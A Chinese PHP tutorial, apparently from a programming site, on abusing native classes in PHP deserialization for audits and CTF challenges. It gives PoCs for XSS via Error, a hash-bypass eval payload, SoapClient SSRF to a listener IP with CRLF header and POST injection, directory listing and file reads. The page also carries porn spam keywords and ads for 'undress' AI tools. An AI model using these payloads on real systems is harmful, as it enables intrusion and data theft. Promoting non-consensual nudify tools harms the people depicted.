国产av日韩一区二区三区精品,成人性爱视频在线观看,国产,欧美,日韩,一区,www.成色av久久成人,2222eeee成人天堂

目錄
淺析php反序列化原生類的利用
一、常見魔術方法
二、原生類中的魔術方法
三、一些常見原生類的利用
Error/Exception
XSS
hash繞過
SoapClient
SSRF
DirectoryIterator/FilesystemIterator
目錄遍歷
SplFileObject
文件讀取
SimpleXMLElement
XXE
ReflectionMethod
獲取注釋內容
首頁 后端開發(fā) php教程 深入了解PHP反序列化原生類

深入了解PHP反序列化原生類

May 17, 2022 am 11:56 AM
php

本篇文章給大家?guī)砹岁P于PHP的相關知識,其中主要介紹了關于反序列化原生類的利用,如果在代碼審計或者ctf中,有反序列化的功能點,但是卻不能構造出完整的pop鏈,那這時我們應該如何破局呢,下面一起來看一下,希望對大家有幫助。

深入了解PHP反序列化原生類

推薦學習:《PHP視頻教程

淺析php反序列化原生類的利用

如果在代碼審計或者ctf中,有反序列化的功能點,但是卻不能構造出完整的pop鏈,那這時我們應該如何破局呢?我們可以嘗試一下從php原生類下手,php有些原生類中內置一些魔術方法,如果我們巧妙構造可控參數(shù),觸發(fā)并利用其內置魔術方法,就有可能達到一些我們想要的目的。

一、常見魔術方法

__wakeup()?//執(zhí)行unserialize()時,先會調用這個函數(shù)
__sleep()?//執(zhí)行serialize()時,先會調用這個函數(shù)
__destruct()?//對象被銷毀時觸發(fā)
__call()?//在對象上下文中調用不可訪問的方法時觸發(fā)
__callStatic()?//在靜態(tài)上下文中調用不可訪問的方法時觸發(fā)
__get()?//用于從不可訪問的屬性讀取數(shù)據(jù)或者不存在這個鍵都會調用此方法
__set()?//用于將數(shù)據(jù)寫入不可訪問的屬性
__isset()?//在不可訪問的屬性上調用isset()或empty()觸發(fā)
__unset()?//在不可訪問的屬性上使用unset()時觸發(fā)
__toString()?//把對象當作字符串使用時觸發(fā)
__invoke()?//當嘗試將對象調用為函數(shù)時觸發(fā)

二、原生類中的魔術方法

我們采用下面腳本遍歷一下所有原生類中的魔術方法

<?php$classes = get_declared_classes();foreach ($classes as $class) {
    $methods = get_class_methods($class);
    foreach ($methods as $method) {
        if (in_array($method, array(
            &#39;__destruct&#39;,
            &#39;__toString&#39;,
            &#39;__wakeup&#39;,
            &#39;__call&#39;,
            &#39;__callStatic&#39;,
            &#39;__get&#39;,
            &#39;__set&#39;,
            &#39;__isset&#39;,
            &#39;__unset&#39;,
            &#39;__invoke&#39;,
            &#39;__set_state&#39;
        ))) {
            print $class . &#39;::&#39; . $method . "\n";
        }
    }}

三、一些常見原生類的利用

Error/Exception

Error 是所有PHP內部錯誤類的基類。 (PHP 7, 8)

**Error::__toString ** error 的字符串表達

返回 Error 的 string表達形式。

Exception是所有用戶級異常的基類。 (PHP 5, 7, 8)

**Exception::__toString ** 將異常對象轉換為字符串

返回轉換為字符串(string)類型的異常。

類屬性

  • message 錯誤消息內容

  • code 錯誤代碼

  • file 拋出錯誤的文件名

  • line 拋出錯誤的行數(shù)

XSS

__toString方法會返回錯誤或異常的字符串形式,其中包含我們輸入的參數(shù),如果我們構造一串xss代碼,結合echo渲染,將觸發(fā)反射形xss漏洞

示例:

<?php$a = unserialize($_GET[&#39;a&#39;]);echo $a;

POC:

<?php$a = new Error("<script>alert('xss')</script>");$b?=?serialize($a);echo?urlencode($b);

image-20220327114659883

hash繞過

先看一道題

[2020 極客大挑戰(zhàn)]Greatphp

<?phperror_reporting(0);class SYCLOVER {
    public $syc;
    public $lover;
    public function __wakeup(){
        if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
???????????if(!preg_match("/\<\?php|\(|\)|\"|\&#39;/", $this->syc,?$match)){
???????????????eval($this->syc);
???????????}?else?{
???????????????die("Try?Hard?!!");
???????????}

????????}
????}}if?(isset($_GET['great'])){
????unserialize($_GET['great']);}?else?{
????highlight_file(__FILE__);}

需要繞過兩個hash強比較,且最終需要構造eval代碼執(zhí)行

顯然正常方法是行不通的,而通過原生類可進行繞過

同樣,當md5()和sha1()函數(shù)處理對象時,會自動調用__tostring方法

先簡單看一下其輸出

<?php$a=new Error("payload",1);$b=new Error("payload",2);$c=new Exception("payload",3);
$d=new Exception("payload",4);
echo $a."<br>";
echo?$b."<br>";
echo?$c."<br>";
echo?$d;

image-20220322205917541

可以發(fā)現(xiàn),這兩個原生類返回的信息除了行號一模一樣,利用這點,我們可以嘗試進行hash函數(shù)的繞過,需要注意的是,必須將兩個傳入的對象放到同一行

因此我們可以進行簡單的測試,發(fā)現(xiàn)使用此方法可以繞過hash強(弱)函數(shù)比較

<?php$a = new Error("payload",1);$b = new Error("payload",2);if ($a!=$b){
    echo &#39;$a不等于$b&#39;."\n";}if (md5($a)===md5($b)){
    echo "md5值相等\n";}if (sha1($a)===sha1($b)){
    echo "sha1值相等";}

image-20220324195852488

根據(jù)這些知識點,我們可以輕松構造payload

  <?phpclass SYCLOVER {
	public $syc;
	public $lover;
	public function __wakeup(){
		if( ($this->syc?!=?$this->lover)?&&?(md5($this->syc)?===?md5($this->lover))?&&?(sha1($this->syc)===?sha1($this->lover))?){
		???if(!preg_match("/\<\?php|\(|\)|\"|\&#39;/", $this->syc,?$match)){
			???eval($this->syc);
		???}?else?{
			???die("Try?Hard?!!");
		???}
		???
		}
	}}$str?=?"?><?=include~".urldecode("%D0%99%93%9E%98")."?>";//兩次取反繞過正則$a=new?Error($str,1);
	$b=new?Error($str,2);
	$c?=?new?SYCLOVER();$c->syc?=?$a;$c->lover?=?$b;
	echo(urlencode(serialize($c)));?>

SoapClient

SoapClient是一個專門用來訪問web服務的類,可以提供一個基于SOAP協(xié)議訪問Web服務的 PHP 客戶端,可以創(chuàng)建soap數(shù)據(jù)報文,與wsdl接口進行交互

soap擴展模塊默認關閉,使用時需手動開啟

SoapClient::__call —調用 SOAP 函數(shù) (PHP 5, 7, 8)

通常,SOAP 函數(shù)可以作為SoapClient對象的方法調用

SSRF

構造函數(shù):

public?SoapClient?::?SoapClient(mixed?$wsdl?[,array?$options?])
第一個參數(shù)是用來指明是否是wsdl模式,如果為`null`,那就是非wsdl模式。
第二個參數(shù)為一個數(shù)組,如果在wsdl模式下,此參數(shù)可選;如果在非wsdl模式下,則必須設置location和uri選項,其中l(wèi)ocation是要將請求發(fā)送到的SOAP服務器的URL,而uri?是SOAP服務的目標命名空間。

什么是soap

SOAP?是基于?XML?的簡易協(xié)議,是用在分散或分布的環(huán)境中交換信息的簡單的協(xié)議,可使應用程序在?HTTP?之上進行信息交換
SOAP是webService三要素(SOAP、WSDL、UDDI)之一:WSDL?用來描述如何訪問具體的接口,?UDDI用來管理,分發(fā),查詢webService?,SOAP(簡單對象訪問協(xié)議)是連接或Web服務或客戶端和Web服務之間的接口。
其采用HTTP作為底層通訊協(xié)議,XML作為數(shù)據(jù)傳送的格式。

我們構造一個利用payload,第一個參數(shù)為NULL,第二個參數(shù)的location設置為vps地址

<?php
$a = new SoapClient(null, array(
&#39;location&#39; =>?'http://47.102.146.95:2333',?
'uri'?=>'uri',
'user_agent'=>'111111'));
$b?=?serialize($a);
echo?$b;
$c?=?unserialize($b);
$c->a();

監(jiān)聽vps的2333端口,如下圖所示成功觸發(fā)SSRF,vps收到了請求信息

且可以看到SOAPAction和user_agent都可控

image-20220326202151356

本地測試時發(fā)現(xiàn),當使用此內置類(即soap協(xié)議)請求存在服務的端口時,會立即報錯,而去訪問不存在服務(未占用)的端口時,會等待一段時間報錯,可以以此進行內網(wǎng)資產的探測。

如果配合CRLF漏洞,還可以可通過 SoapClient 來控制其他參數(shù)或者post發(fā)送數(shù)據(jù)。例如:HTTP協(xié)議去攻擊Redis

CRLF知識擴展

HTTP報文的結構:狀態(tài)行和首部中的每行以CRLF結束,首部與主體之間由一空行分隔。
CRLF注入漏洞,是因為Web應用沒有對用戶輸入做嚴格驗證,導致攻擊者可以輸入一些惡意字符。
攻擊者一旦向請求行或首部中的字段注入惡意的CRLF(\r\n),就能注入一些首部字段或報文主體,并在響應中輸出。

通過結合CRLF,我們利用SoapClient+CRLF便可以干更多的事情,例如插入自定義Cookie,

<?php$a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nCookie:?PHPSESSION=dasdasd564d6as4d6a"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

image-20220326204543138

發(fā)送POST的數(shù)據(jù)包,這里需要將Content-Type設置為application/x-www-form-urlencoded,我們可以通過添加兩個\r\n來將原來的Content-Type擠下去,自定義一個新的Content-Type

<?php$a = new SoapClient(null, array(
    &#39;location&#39; =>?'http://47.102.146.95:2333',
????'uri'?=>'uri',
????'user_agent'=>"111111\r\nContent-Type:?application/x-www-form-urlencoded\r\nX-Forwarded-For:?127.0.0.1\r\nCookie:?PHPSESSID=3stu05dr969ogmprk28drnju93\r\nContent-Length:?10\r\n\r\npostdata"));
????$b?=?serialize($a);echo?$b;$c?=?unserialize($b);$c->a();

image-20220326205821109

看一道ctfshow上的題,完美利用上述知識點

$xff?=?explode(',',?$_SERVER['HTTP_X_FORWARDED_FOR']);
array_pop($xff);
$ip?=?array_pop($xff);?//獲取xff頭


if($ip!=='127.0.0.1'){
????die('error');
}else{
????$token?=?$_POST['token'];
????if($token=='ctfshow'){
????????file_put_contents('flag.txt',$flag);
????}
}

poc:

<?php
$target = &#39;http://127.0.0.1/flag.php&#39;;
$post_string = &#39;token=ctfshow&#39;;
$b = new SoapClient(null,array(&#39;location&#39; =>?$target,'user_agent'=>'wupco^^X-Forwarded-For:127.0.0.1,127.0.0.1^^Content-Type:?application/x-www-form-urlencoded'.'^^Content-Length:?'.(string)strlen($post_string).'^^^^'.$post_string,'uri'=>?"ssrf"));
$a?=?serialize($b);
$a?=?str_replace('^^',"\r\n",$a);
echo?urlencode($a);
?>

DirectoryIterator/FilesystemIterator

DirectoryIterator類提供了一個簡單的接口來查看文件系統(tǒng)目錄的內容。

DirectoryIterator::__toString 獲取字符串形式的文件名 (PHP 5,7,8)

目錄遍歷

使用此內置類的__toString方法結合glob或file協(xié)議,即可實現(xiàn)目錄遍歷

例如:

<?php
$a?=?new?DirectoryIterator("glob:///*");
foreach?($a?as?$b){
????echo?$b.'<br>';
}

FilesystemIterator繼承于DirectoryIterator,兩者作用和用法基本相同,區(qū)別為FilesystemIterator會顯示文件的完整路徑,而DirectoryIterator只顯示文件名

image-20220329185934148

因為可以配合使用glob偽協(xié)議(查找匹配的文件路徑模式),所以可以繞過open_basedir的限制

在php4.3以后使用了zend_class_unserialize_deny來禁止一些類的反序列化,很不幸的是這兩個原生類都在禁止名單當中

SplFileObject

SplFileObject 類為單個文件的信息提供了一個面向對象的高級接口

(PHP 5 >= 5.1.2, PHP 7, PHP 8)

文件讀取

SplFileObject::__toString — 以字符串形式返回文件的路徑

<?phphighlight_file(__file__);$a = new SplFileObject("./flag.txt");echo $a;/*foreach($context as $f){
    echo($a);
}*/

如果沒有遍歷的話只能讀取第一行,且受到open_basedir影響

SimpleXMLElement

解析XML 文檔中的元素。 (PHP 5、PHP 7、PHP 8)

SimpleXMLElement::__construct — 創(chuàng)建一個新的 SimpleXMLElement 對象

XXE

我們查看一下其參數(shù):

image-20220324204259723

根據(jù)官方文檔,發(fā)現(xiàn)當?shù)谌齻€參數(shù)為True時,即可實現(xiàn)遠程xml文件載入,第二個參數(shù)的常量值設置為2即可。

利用可參考賽題:[SUCTF 2018]Homework

ReflectionMethod

獲取注釋內容

(PHP 5 >= 5.1.0, PHP 7, PHP 8)

ReflectionFunctionAbstract::getDocComment — 獲取注釋內容
由該原生類中的getDocComment方法可以訪問到注釋的內容

image-20220331175819047

同時可利用的原生類還有ZipArchive– 刪除文件等等,不在敘述

推薦學習:《PHP視頻教程

以上是深入了解PHP反序列化原生類的詳細內容。更多信息請關注PHP中文網(wǎng)其他相關文章!

本站聲明
本文內容由網(wǎng)友自發(fā)貢獻,版權歸原作者所有,本站不承擔相應法律責任。如您發(fā)現(xiàn)有涉嫌抄襲侵權的內容,請聯(lián)系admin@php.cn

熱AI工具

Undress AI Tool

Undress AI Tool

免費脫衣服圖片

Undresser.AI Undress

Undresser.AI Undress

人工智能驅動的應用程序,用于創(chuàng)建逼真的裸體照片

AI Clothes Remover

AI Clothes Remover

用于從照片中去除衣服的在線人工智能工具。

Clothoff.io

Clothoff.io

AI脫衣機

Video Face Swap

Video Face Swap

使用我們完全免費的人工智能換臉工具輕松在任何視頻中換臉!

熱工具

記事本++7.3.1

記事本++7.3.1

好用且免費的代碼編輯器

SublimeText3漢化版

SublimeText3漢化版

中文版,非常好用

禪工作室 13.0.1

禪工作室 13.0.1

功能強大的PHP集成開發(fā)環(huán)境

Dreamweaver CS6

Dreamweaver CS6

視覺化網(wǎng)頁開發(fā)工具

SublimeText3 Mac版

SublimeText3 Mac版

神級代碼編輯軟件(SublimeText3)

如何在PHP中獲取當前的會話ID? 如何在PHP中獲取當前的會話ID? Jul 13, 2025 am 03:02 AM

在PHP中獲取當前會話ID的方法是使用session_id()函數(shù),但必須先調用session_start()才能成功獲取。1.調用session_start()啟動會話;2.使用session_id()讀取會話ID,輸出類似abc123def456ghi789的字符串;3.若返回為空,檢查是否遺漏session_start()、用戶是否首次訪問或會話是否被銷毀;4.會話ID可用于日志記錄、安全驗證和跨請求通信,但需注意安全性。確保正確開啟會話后即可順利獲取ID。

php從字符串獲取子字符串 php從字符串獲取子字符串 Jul 13, 2025 am 02:59 AM

要從PHP字符串中提取子字符串,可使用substr()函數(shù),其語法為substr(string$string,int$start,?int$length=null),若未指定長度則截取至末尾;處理多字節(jié)字符如中文時應使用mb_substr()函數(shù)以避免亂碼;若需根據(jù)特定分隔符截取字符串,可使用explode()或結合strpos()與substr()實現(xiàn),例如提取文件名擴展名或域名。

如何將字符串分為PHP中的數(shù)組 如何將字符串分為PHP中的數(shù)組 Jul 13, 2025 am 02:59 AM

在PHP中,最常用的方法是使用explode()函數(shù)將字符串拆分為數(shù)組。該函數(shù)通過指定的分隔符將字符串分割成多個部分并返回數(shù)組,語法為explode(separator,string,limit),其中separator為分隔符,string為原字符串,limit為可選參數(shù)控制最大分割數(shù)量。例如$str="apple,banana,orange";$arr=explode(",",$str);結果為["apple","bana

JavaScript數(shù)據(jù)類型:原始與參考 JavaScript數(shù)據(jù)類型:原始與參考 Jul 13, 2025 am 02:43 AM

JavaScript的數(shù)據(jù)類型分為原始類型和引用類型。原始類型包括string、number、boolean、null、undefined和symbol,其值不可變且賦值時復制副本,因此互不影響;引用類型如對象、數(shù)組和函數(shù)存儲的是內存地址,指向同一對象的變量會相互影響。判斷類型可用typeof和instanceof,但需注意typeofnull的歷史問題。理解這兩類差異有助于編寫更穩(wěn)定可靠的代碼。

在C中使用std :: Chrono 在C中使用std :: Chrono Jul 15, 2025 am 01:30 AM

std::chrono在C 中用于處理時間,包括獲取當前時間、測量執(zhí)行時間、操作時間點與持續(xù)時間及格式化解析時間。1.獲取當前時間使用std::chrono::system_clock::now(),可轉換為可讀字符串但系統(tǒng)時鐘可能不單調;2.測量執(zhí)行時間應使用std::chrono::steady_clock以確保單調性,并通過duration_cast轉換為毫秒、秒等單位;3.時間點(time_point)和持續(xù)時間(duration)可相互操作,但需注意單位兼容性和時鐘紀元(epoch)

如何將會話變量傳遞給PHP中的另一頁? 如何將會話變量傳遞給PHP中的另一頁? Jul 13, 2025 am 02:39 AM

在PHP中,要將一個會話變量傳到另一個頁面,關鍵在于正確開啟會話并使用相同的$_SESSION鍵名。1.每個頁面使用session變量前必須調用session_start(),且放在腳本最前面;2.在第一個頁面設置session變量如$_SESSION['username']='JohnDoe';3.在另一頁面同樣調用session_start()后通過相同鍵名訪問變量;4.確保每個頁面都調用session_start()、避免提前輸出內容、檢查服務器上session存儲路徑可寫;5.使用ses

PHP如何處理環(huán)境變量? PHP如何處理環(huán)境變量? Jul 14, 2025 am 03:01 AM

toAccessenvironmentVariablesInphp,useGetenv()或$ _envsuperglobal.1.getEnv('var_name')retievesSpecificvariable.2。$ _ en v ['var_name'] accessesvariablesifvariables_orderInphp.iniincludes“ e” .setVariablesViaCliWithvar = vualitephpscript.php,inapach

See all articles